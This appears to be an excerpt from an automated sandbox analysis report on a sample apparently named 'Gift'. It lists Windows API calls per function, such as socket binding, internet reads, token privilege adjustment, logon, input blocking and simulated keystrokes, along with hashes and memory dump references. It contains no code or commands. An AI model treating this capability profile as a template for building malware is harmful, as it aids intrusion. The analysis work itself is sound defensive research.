                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                          • String ID:
                                                                          • API String ID: 1279440585-0
                                                                          • Opcode ID: a55a634fb9861dea5558d0403bbfb00e16583b848cbb02963378a8f9602d84cf
                                                                          • Instruction ID: 2ee109808e15c77e54ea7181a79f3ef8f261be5ed7dbe5b235aa93ee6308f67a
                                                                          • Opcode Fuzzy Hash: a55a634fb9861dea5558d0403bbfb00e16583b848cbb02963378a8f9602d84cf
                                                                          • Instruction Fuzzy Hash: F621D0702006109FCB01EF64C98AA6EB7F9EF49720F118559E856AB391CBB0BC01CB91
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 002D1DD6
                                                                          • GetSysColor.USER32(0000000F), ref: 002D1E2A
                                                                          • SetBkColor.GDI32(?,00000000), ref: 002D1E3D
                                                                            • Part of subcall function 002D166C: DefDlgProcW.USER32(?,00000020,?), ref: 002D16B4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ColorProc$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 3744519093-0
                                                                          • Opcode ID: 8cd9d3980b204e0d6ba57af0eec09b453004df3ae835e1ba0c03fcba806029f0
                                                                          • Instruction ID: c1cb0d0face967c6d9a664f39055f57bc90b3e868c5f4f067af046b2b86b5c63
                                                                          • Opcode Fuzzy Hash: 8cd9d3980b204e0d6ba57af0eec09b453004df3ae835e1ba0c03fcba806029f0
                                                                          • Instruction Fuzzy Hash: B1A1787013A605BEE62EAF699C59EBB765EDF42301F25010BF442CABD1CB618D31C276
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0033C329
                                                                          • _wcscmp.LIBCMT ref: 0033C359
                                                                          • _wcscmp.LIBCMT ref: 0033C36E
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0033C37F
                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0033C3AF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 2387731787-0
                                                                          • Opcode ID: 1673c7826a3e36a9e2098b0797562371027d385369b0f74875ea6e62f907d217
                                                                          • Instruction ID: 24a2251459ca5bae891a2b51855e34fcd89e05f8688b9bf0c19c4f50e005c58a
                                                                          • Opcode Fuzzy Hash: 1673c7826a3e36a9e2098b0797562371027d385369b0f74875ea6e62f907d217
                                                                          • Instruction Fuzzy Hash: 2C519D356146028FC719DF68C4D19AAB3E8FF49320F11862DE95A97361DB34ED14CB91
                                                                          APIs
                                                                            • Part of subcall function 00348475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003484A0
                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00346E89
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00346EB2
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00346EEB
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00346EF8
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00346F0C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 99427753-0
                                                                          • Opcode ID: 3bc2d6840acce2ea0bf6c8738bbb405aa425158d9ce80e1b949d254477544000
                                                                          • Instruction ID: d11ce34b708f7cafe3174143abaf23309d8f696dbece80c55ea189c68cac6be3
                                                                          • Opcode Fuzzy Hash: 3bc2d6840acce2ea0bf6c8738bbb405aa425158d9ce80e1b949d254477544000
                                                                          • Instruction Fuzzy Hash: CC41EF75610210AFDB11BF64DC8BF6E73E9AF48714F008459F946AB3D2CA70AD108FA2
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                          • String ID:
                                                                          • API String ID: 292994002-0
                                                                          • Opcode ID: 2ec175def26a96450139d2549f2fe8a5b010fe699865079677ad81e43bbde9cc
                                                                          • Instruction ID: a2290b877169e9f926dc8c4772aa6ed41f21810eefbec949d663769814f816ef
                                                                          • Opcode Fuzzy Hash: 2ec175def26a96450139d2549f2fe8a5b010fe699865079677ad81e43bbde9cc
                                                                          • Instruction Fuzzy Hash: 8C11B2723009119BE7235F669C95E2B7BADEF84722F028529EC46D7251DB74AD018AA0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LocalTime__swprintf
                                                                          • String ID: %.3d$WIN_XPe
                                                                          • API String ID: 2070861257-2409531811
                                                                          • Opcode ID: 96e8ec7a04cbe0ed5a198304ffa63a0bbc1ef3c8a10fc6161656c2fcda55d0a6
                                                                          • Instruction ID: 5076ab1a530407e4679e20ad37bb5da1ae38b117f7294901a82947f8c36bb6da
                                                                          • Opcode Fuzzy Hash: 96e8ec7a04cbe0ed5a198304ffa63a0bbc1ef3c8a10fc6161656c2fcda55d0a6
                                                                          • Instruction Fuzzy Hash: 9DD01271814109EAC70E9B90C845DFAB37CBB0C344F104453F546A2440E6B58BDC9B22
                                                                          APIs
                                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00342AAD
                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00342AE4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                          • String ID:
                                                                          • API String ID: 599397726-0
                                                                          • Opcode ID: 619d019335c994ef67e5be3fa9af4d373229d8650a9a12f0ad87520c8a13c49a
                                                                          • Instruction ID: c919d77065a9324776225c96ae446bc853381ba1318972b6b4cbebf5233f5700
                                                                          • Opcode Fuzzy Hash: 619d019335c994ef67e5be3fa9af4d373229d8650a9a12f0ad87520c8a13c49a
                                                                          • Instruction Fuzzy Hash: 5041D371600209BFEB22DE55CC85EBBB7FCEB40754F50406EFA05BB541EAB1BE419A60
                                                                          APIs
                                                                            • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
                                                                            • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003293E3
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00329410
                                                                          • GetLastError.KERNEL32 ref: 0032941D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1922334811-0
                                                                          • Opcode ID: 6a3e385b1624bb4ca188d434bd00995fcfc0c371ca9b96483a96b845d93b0d72
                                                                          • Instruction ID: c0e5b7fb8c251a00a8c5bd0b46a62d65c606bee4626520213a4ca698b47fc4a8
                                                                          • Opcode Fuzzy Hash: 6a3e385b1624bb4ca188d434bd00995fcfc0c371ca9b96483a96b845d93b0d72
                                                                          • Instruction Fuzzy Hash: F81182B2414209AFD729DF64ECC6D2BB7BCFB44750B21852EE45992641EB70AC51CB60
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00334271
                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003342B2
                                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003342BD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                          • String ID:
                                                                          • API String ID: 33631002-0
                                                                          • Opcode ID: 69cfba86a1728216f716d766913de7935bd3061517942f8a42edc44e82530551
                                                                          • Instruction ID: 3cba92daf31977a861f3abffefba77d55650a184513490a9e5d1c95f3b23bb25
                                                                          • Opcode Fuzzy Hash: 69cfba86a1728216f716d766913de7935bd3061517942f8a42edc44e82530551
                                                                          • Instruction Fuzzy Hash: CC115275E01228BFDB518F959C85BAFBBBCEB45B60F108555FD04F7290C6705E018BA1
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00334F45
                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00334F5C
                                                                          • FreeSid.ADVAPI32(?), ref: 00334F6C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                          • String ID:
                                                                          • API String ID: 3429775523-0
                                                                          • Opcode ID: d0c2991e0b03eaade39bcbe9db69913771d2faff8d96da3bf5fc7afb928d3501
                                                                          • Instruction ID: e8cf31fc6ee9ca24a1ffd19c162bcc674190b11793c87fdea8c1fdd608bbfaf4
                                                                          • Opcode Fuzzy Hash: d0c2991e0b03eaade39bcbe9db69913771d2faff8d96da3bf5fc7afb928d3501
                                                                          • Instruction Fuzzy Hash: 55F03775A1120CBFDB05DFE09D8AAAEBBBCEB08301F0044A9E901E2180E6746A048B50
                                                                          APIs
                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00331B01
                                                                          • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00331B14
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InputSendkeybd_event
                                                                          • String ID:
                                                                          • API String ID: 3536248340-0
                                                                          • Opcode ID: c82481f16afebcd493635464f2cef46815935db3fb77a7a4054a1deb4ac36a8a
                                                                          • Instruction ID: b47862ed75fd42df5a234bb17e26a5b5cea82ad5f2370531ce689ffb6fb041b4
                                                                          • Opcode Fuzzy Hash: c82481f16afebcd493635464f2cef46815935db3fb77a7a4054a1deb4ac36a8a
                                                                          • Instruction Fuzzy Hash: A3F0497190420DABDB05CF94C806BFEBBB8FF04315F00804AF95696292D3799615DF94
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00349B52,?,0036098C,?), ref: 0033A6DA
                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00349B52,?,0036098C,?), ref: 0033A6EC
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatLastMessage
                                                                          • String ID:
                                                                          • API String ID: 3479602957-0
                                                                          • Opcode ID: 25973f3dd1ac8a1efca186e90849ddb29b1b012e7e747aa7acfb7b3ed80b6737
                                                                          • Instruction ID: c54a83f603718bae5535394ccfa38ec86b038a2d269e672c864804e31a517c04
                                                                          • Opcode Fuzzy Hash: 25973f3dd1ac8a1efca186e90849ddb29b1b012e7e747aa7acfb7b3ed80b6737
                                                                          • Instruction Fuzzy Hash: 9AF0E23500422DBBDB22AFA4CC89FEA376CAF08361F008165F80896290D6709940CBA1
                                                                          APIs
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00328F27), ref: 00328DFE
                                                                          • CloseHandle.KERNEL32(?,?,00328F27), ref: 00328E10
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                          • String ID:
                                                                          • API String ID: 81990902-0
                                                                          • Opcode ID: 524ba3669e45cee04bbd912d2f991c0c4e65291d448625c27391e9c4c0fb6f8f
                                                                          • Instruction ID: 05ac69dca6cefbdf11f2ebee88ffba50d1a286f7201150c62a18f48784f06c93
                                                                          • Opcode Fuzzy Hash: 524ba3669e45cee04bbd912d2f991c0c4e65291d448625c27391e9c4c0fb6f8f
                                                                          • Instruction Fuzzy Hash: 00E0BF76014611EFE7272B60EC09D77B7ADEB04351B15892DF95580570DB626CA0DB50
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,002F8F87,?,?,?,00000001), ref: 002FA38A
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002FA393
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 66bcb1a778a16933db9fcd61bf08440b49b0a033967d79d0061b0c63d1854c55
                                                                          • Instruction ID: a0e601ba3fefaf3befe6fb2c80d5f72070ab4b0d63be7d793a8937450433b39b
                                                                          • Opcode Fuzzy Hash: 66bcb1a778a16933db9fcd61bf08440b49b0a033967d79d0061b0c63d1854c55
                                                                          • Instruction Fuzzy Hash: 93B09235064208ABCA462B91EC0AB8A3F6CEB44B63F108010F64D44260EBE254508A91
                                                                          APIs
                                                                          • BlockInput.USER32(00000001), ref: 003445F0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BlockInput
                                                                          • String ID:
                                                                          • API String ID: 3456056419-0
                                                                          • Opcode ID: 91c22217c04808f270623e53ab7961c34eb257340b85874eabeaae2aeb96c10c
                                                                          • Instruction ID: eb9c1f29a004d3c003b50e138c4ee1d9992aa2dfd0c8e2e53102e335f488a9d0
                                                                          • Opcode Fuzzy Hash: 91c22217c04808f270623e53ab7961c34eb257340b85874eabeaae2aeb96c10c
                                                                          • Instruction Fuzzy Hash: 1CE09A312102159FD701AF59E800A9AB7ECEF98760F008426F809DB350DAB0BD008B90
                                                                          APIs
                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00335205
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: mouse_event
                                                                          • String ID:
                                                                          • API String ID: 2434400541-0
                                                                          • Opcode ID: fa7d93f4f71976d8d86d5ff55682aecd11978fd22a79d53638206df074491230
                                                                          • Instruction ID: 544a150d3ce5e89e3d07f4eb0d86101e35d60d069e6126dc7f484bc00768c642
                                                                          • Opcode Fuzzy Hash: fa7d93f4f71976d8d86d5ff55682aecd11978fd22a79d53638206df074491230
                                                                          • Instruction Fuzzy Hash: 6AD092A5964E0A79ED5A07249E9FF77160CE3017C1F968749B142C94C3ECD46885A432
                                                                          APIs
                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00328FA7), ref: 00329389
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LogonUser
                                                                          • String ID:
                                                                          • API String ID: 1244722697-0
                                                                          • Opcode ID: f9e2e95b0a533f3d8da8948db9954039828b1a9f4df7968460fb65286612e116
                                                                          • Instruction ID: 662e39fc6a43389eda1b9e7bf99102b0808e8af2ab3c2930830b0e9c69c3ec7b
                                                                          • Opcode Fuzzy Hash: f9e2e95b0a533f3d8da8948db9954039828b1a9f4df7968460fb65286612e116
                                                                          • Instruction Fuzzy Hash: B6D05E3226050EBBEF028EA4DD02EAF3B69EB04B01F408111FE15C50A0C775D835AB60
                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00310734
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: 040f002e5d784558ad7f5ff69586e7c314ac3aa8f2b35650fc9b621d6f498f00
                                                                          • Instruction ID: e4cf35a7ef0f1668d1b9f134015180224fd67ff13d7870266b103c02242bf8a2
                                                                          • Opcode Fuzzy Hash: 040f002e5d784558ad7f5ff69586e7c314ac3aa8f2b35650fc9b621d6f498f00
                                                                          • Instruction Fuzzy Hash: E3C04CF1800109DBCB0ADBA0D988EEF77BCBB08304F104455E145B2100D7B49B848A71
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 002FA35A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
